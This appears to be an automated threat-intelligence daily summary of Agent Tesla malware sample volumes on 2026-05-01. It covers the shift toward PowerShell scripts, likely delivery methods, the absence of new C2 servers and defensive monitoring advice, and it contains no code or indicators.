Daily Summary
Agent Tesla sample collection spiked sharply on 2026-05-01 with 80 new samples, 31% above the 7-day average of 61. This represents the highest daily volume observed in the current tracking window, signaling a deliberate campaign push rather than background noise.
New Samples Detected
PowerShell scripts dominate today at 36 samples (45% of total), a marked shift from the typical .exe-led distribution. Executables account for only 15 samples, while JavaScript (14), batch files (3), and DLLs (3) round out the top five. Compressed archives (rar, zip, gz) are minimal at 4 total, suggesting a pivot toward direct script execution over attachment-based delivery. No new C2 servers were observed, indicating reuse of existing infrastructure.
Distribution Methods
The high volume of .ps1 files points to phishing campaigns leveraging email attachments or download links that execute PowerShell in-memory. The presence of .js and .vbs files alongside .bat and .cmd scripts suggests a multi-layered dropper chain, likely using a script to decode and load the final payload. The low archive count may indicate that delivery is via direct script links rather than zipped attachments.
Detection Rate
Based on historical patterns, current Agent Tesla variants exhibit moderate evasion against signature-based engines when delivered via PowerShell. The heavy use of .ps1 files today suggests attackers are exploiting lower detection rates for script-based payloads compared to packed .exe files. SOC teams should verify that behavioral detection rules are tuned for PowerShell injection.
C2 Infrastructure
No new C2 servers were identified on 2026-05-01. This is unusual given the spike in samples and may indicate that attackers are rotating existing C2s or using fast-flux proxies. All 80 new IOCs are sample hashes; no domain or IP intelligence was added.
7-Day Trend
Today’s surge breaks a relatively flat week, where daily counts fluctuated between 45 and 65. The 31% increase above average suggests a coordinated campaign is underway, likely tied to specific lure themes.
Security Analysis
The dominance of PowerShell scripts over executables represents a tactical shift from Agent Tesla’s typical modus operandi. Historically, this family has relied on compiled binaries in archives; today’s volume of .ps1 files suggests attackers are leveraging Living-off-the-Land (LotL) techniques to bypass application allowlisting and static analysis. Defenders should enforce PowerShell execution policy restrictions and monitor for outbound HTTPS traffic to known Agent Tesla C2 patterns (e.g., specific URI paths or user-agent strings).